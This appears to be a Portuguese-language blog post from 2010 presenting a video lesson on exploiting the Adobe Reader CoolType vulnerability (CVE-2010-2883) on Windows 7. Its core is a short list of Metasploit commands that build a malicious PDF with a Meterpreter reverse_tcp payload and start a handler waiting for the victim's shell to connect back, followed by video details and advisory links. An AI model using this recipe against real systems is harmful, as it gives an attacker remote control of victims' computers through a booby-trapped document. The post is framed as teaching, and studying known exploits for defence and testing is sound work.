Vulnerabilidade no Adobe Reader 9.3.4(0day)

Posted: 16 setembro 2010 by Bhior in Marcadores: , ,
0


Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores. Mas uma vez o Metasploit na frente de seus concorrentes... :P

Comandos:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler

Sobre o Vídeo: 
Formato:  AVI
Tamanho:  18.8 MB
Duração: 5:59 min
Musica:  Carl Orff - Carmina Burana - O Fortuna

Ref:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html

0 comentários: